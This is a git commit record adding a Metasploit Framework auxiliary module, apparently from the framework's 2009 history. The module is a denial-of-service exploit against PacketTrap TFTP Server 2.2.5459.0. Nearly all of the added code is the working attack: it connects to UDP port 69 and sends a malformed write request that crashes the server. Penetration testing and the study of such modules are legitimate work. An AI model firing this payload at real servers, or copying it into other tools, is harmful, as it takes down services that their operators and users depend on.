Moved tftp to Windows DoS targets. Hmm svn client bug?

git-svn-id: file:///home/svn/framework3/trunk@6096 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Patrick Webster 2009-01-09 05:39:57 +00:00
parent 0b9e8cd2b9
commit cf04190a8a
1 changed files with 43 additions and 0 deletions

View File

@ -0,0 +1,43 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
'Description' => %q{
The PacketTrap TFTP server version 2.2.5459.0 can be
brought down by sending a special write request.
},
'Author' => 'kris',
'License' => MSF_LICENSE,
'Version' => '$Revision: 6034 $',
'References' =>
[ [ 'URL', 'http://milw0rm.com/exploits/6863'] ],
'DisclosureDate' => 'Oct 29 2008'))
register_options([Opt::RPORT(69)])
end
def run
connect_udp
print_status("Sending write request...")
udp_sock.put("\x00\x02|\x00netascii\x00")
disconnect_udp
end
end